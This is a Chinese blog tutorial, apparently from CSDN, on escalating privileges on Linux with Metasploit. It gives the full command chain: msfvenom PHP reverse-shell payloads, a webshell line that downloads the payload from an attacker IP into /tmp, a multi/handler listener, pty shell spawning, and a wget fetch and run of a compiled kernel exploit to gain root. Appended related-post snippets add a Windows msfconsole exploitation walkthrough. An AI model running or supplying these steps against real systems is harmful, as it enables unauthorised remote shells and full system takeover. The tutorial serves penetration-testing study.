metasploit linux 提权(本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。)

已于 2023-09-07 14:26:31 修改
阅读量323 收藏 1
点赞数
分类专栏: # Linux提权篇 网络安全,渗透测试 文章标签: 网络安全
于 2023-09-06 15:21:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73628117/article/details/132711158
版权

1、 简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

2、 使用metasploit linux提权

1.先开启一个http服务器
python -m http.server 8090
python -m SimpleHTTPServer 8090  //这两种写法都行,一个不行就换另外一种

linux提权01

2.生成攻击载荷

​ //在kali中生成,这里面不要有中文字符,不然后面会乱码

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.121.133 LPORT=9999 -f raw > 

msf.php  //ip和端口都是本地(kali攻击者)的,raw后面是在本地生成文件的路径 

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.121.133 lport=7777 -o MS.php

linux提权02

3.下载(有两种方法)
1.先找到tmp文件夹地址,tmp文件夹所有用户都可以写入linux提权03
2.A 浏览器利用webshell(后门一句话)下载

file_put_contents('../tmp/msf.php',file_get_contents('http://192.168.0.189//Desktop/msf.php'));
//两个都是php函数,详细查百度
file_put_contents('../tmp/msf.php', file_get_contents('http://192.168.121.133/Desktop/msf.php'), FILE_APPEND|LOCK_EX);

linux提权04

再看看tmp里面有没有msf.php

linux提权05

可以看见成功了。

2.B 或者利用反弹shell,wget下载,详细看前面的文章
4.本地监听
1.接着在本地执行msfconsole(注意不要写错)

linux07

//每行都要执行
use exploit/multi/handler 
set payload php/meterpreter_reverse_tcp 
set lhost 192.168.121.133  //kali的ip
set lport 12345 //端口和上面的对应
exploit //执行完这步就能做监听了

如图:linux提权08

然后我们执行命令,会发现不行:linux提权09

为什么呢,是因为浏览器还没访问msf.php,访问一下就行了:linux提权10

// 如果还是不行的话有可能是复制有问题,不能使用ctrl+shift+c复制

shel.php 的内容

反弹shell

http://www.moontester.com//upload/shellx.php

在metasploit设置好监听模块 访问shellx.php 就会获取一个session

5. 提权命令

getuid 查看当前用户

使用模块查询漏洞

run post/multi/recon/local_exploit_suggester

输入shell 就能使用终端命令

从[https://www.exploit-db.com/exploits/37292

这里复制c文件下来,放到kali里面进行编译:

gcc xxx.c -o exp

然后 输入shell,进行终端命令:

linux提权11

终端有些时候系统的命令终端不允许直接访问,可以使用python虚拟化一个终端来执行

python -c 'import pty;pty.spawn("/bin/bash")'`
python3 -c 'import pty;pty.spawn("/bin/bash")'

然后使用wget下载编译好的二进制文件,名为exp的文件

wget http://192.168.xxx.xxx/Desktop/exp

然后使用 chmod +x exp //给exp加入执行权限

然后输入 ./exp 执行

如果成功就会得到一个root

日月言寺
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
操作系统权限提升(二十)之Linux提权-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 965
先准备一个SUID文件或者权限为xx7的文件,让低权限的用户可以执行文件的修改,在这里我们我们准备一个sh文件或者python文件都可以,我们写一个linux运维脚本,来监控当前电脑的运行参数。linux计划任务提权是因为权限配置不当,计划任务以root权限运行,低权限的用户可以修改计划任务的文件,从而被攻击者利用,导致提权Linux计划任务命令如下。linux文件权第一部分是该文件的拥有者所拥有的权限,第二部分是该文件所在用户组的用户所拥有的权限,最后一部分是其他用户所拥有的权限。
MSF模拟渗透测试攻击linux实例
lza20001103的博客
04-09 9143
MSF模拟渗透测试攻击linux实例
使用MSF进行提权(windows提权linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 630
​MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
Metasploit提权和后渗透
Kali与编程
12-04 1511
后渗透技术包括提权、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、提高攻击者的权限、绕过防御措施等。在本文中,我将详细介绍Metasploit提权模块和技术,包括Windows和Linux系统下的提权模块和技术,以及如何使用Metasploit进行提权攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统。
使用MSF进行提权(windows提权linux提权、wesng使用)
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
Linux提权不能反弹Shell时利用metasploit进行提权.txt
03-18
Linux提权不能反弹Shell时利用metasploit进行提权.txt
metasploit linux 提权.md
09-06
metasploit linux 提权.md
metasploit下Windows的多种提权方法
02-25
当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒。...
kali下msf提权
失心少年
09-23 4726
生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler s...
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
06-24
0x09.第九课 Metasploit生成linux木马并尝试提权.pdf
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权
weixin_51803729的博客
02-12 5200
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权
操作系统权限提升(十八)之Linux提权-内核提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-27 2722
内核提权利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节:1、对目标系统进行信息收集,获取到系统内核信息及版本信息;2、根据内核版本获取其对应的漏洞以及EXP3、使用找到的EXP对目标系统发起攻击,完成提权操作EXP该怎么着呢,可以用Kali去寻找,kali中自带searchsploit命令可以查找EXP,输入对应的版本号就可以查找相应的漏洞输入就会自动复制该文件到当前目录。
meterpreter提权小结
MercyLin的博客
09-05 2960
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行提权 首先我们可以输入getuid来查看当前用户的权限~ 可以看到我们貌似可能是管理员权限,到底是不是还有待验证,我们的最终目的是将其提升到system权限. getsystem自动提权 输入getsystem来尝试提权,MSF会自动选择合适的方式来提升当前权限 这个就比较玄学,我还没成功过,可以看到g...
Linux系统提权思路
热门推荐
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的提权exp放出来,如果有的话,直接编译运行提权即可,简单粗暴。       如果没有相关内核的提权exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种提权思路,第一种就是内核e
Meterpreter提权详解
子曰小玖的博客
08-08 3180
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windo...
metasploit---后漏洞利用-提权
孤的博客
11-17 1760
提权就是提升对资源的访问权限,正常情况下,这些资源是否保护的,拒绝普通或为授权用户访问。通过提升权限,恶意用户可以执行为授权的行为,可以对计算机或者整个网络造成危害。 提权广义上分为两种形式 垂直提权:在这种权限提升方式中,低权限的用户或应用程序能够访问那些只针对授权用户或管理员用户才能使用的功能。这种特征也称作权限升级。 水平提权:这种提权通常指的是用户权限在水平方向的扩展,也就是,普通用户能访...
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4281
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
(1) 利用MS18-8120通过Metasploit对Windows提权
05-10
MS18-8120是一个Windows提权漏洞,它可以影响Windows 7 SP1 x86和x64、Windows 8.1 x86和x64、Windows Server 2008 R2 SP1、Windows Server 2012和Windows Server 2012 R2。这个漏洞是在Windows内核中存在一个缺陷,攻击者可以利用这个缺陷来提升他们的权限,从而执行任意代码。 下面是一些利用MS18-8120漏洞进行Windows提权的步骤: 1.使用Metasploit框架:Metasploit是一个开源的渗透测试框架,它可以帮助安全专业人员快速、高效地发现和利用漏洞。在这个案例中,我们将使用Metasploit框架来利用MS18-8120漏洞。 2. 扫描目标:首先,我们需要扫描目标系统以检测是否存在漏洞。使用Nmap或其他扫描工具扫描目标IP地址,如下所示: ``` nmap -sV -O targetIP ``` 3. 打开Metasploit:打开Kali Linux操作系统并打开Metasploit框架,使用以下命令: ``` msfconsole ``` 4. 搜索漏洞利用模块:在Metasploit控制台中,使用以下命令搜索与MS18-8120漏洞相关的模块: ``` search MS18-8120 ``` 5. 选择漏洞利用模块:从搜索结果中选择一个适合我们的漏洞利用模块。在这个案例中,我们将选择“exploit/windows/local/ms18_8120_dcom”,使用以下命令: ``` use exploit/windows/local/ms18_8120_dcom ``` 6. 配置漏洞利用模块:在我们使用模块之前,我们需要配置一些参数。使用以下命令来查看可用的参数: ``` show options ``` 7. 配置目标IP地址和端口号:我们需要设置目标IP地址和端口号。使用以下命令设置目标IP地址和端口号: ``` set RHOST targetIP set RPORT targetPort ``` 8. 运行漏洞利用模块:设置完参数后,使用以下命令运行漏洞利用模块: ``` run ``` 9. 检查提权结果:漏洞利用模块运行后,我们可以检查提权结果。使用以下命令检查当前用户的权限: ``` getuid ``` 如果返回结果为“NT AUTHORITY\SYSTEM”,则说明我们已经成功提升了我们的权限。 总结: 通过使用Metasploit框架和MS18-8120漏洞利用模块,我们可以快速、高效地进行Windows提权攻击。但是请注意,任何未经授权的攻击都是非法的。只有在合法的渗透测试环境中使用这些技术

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值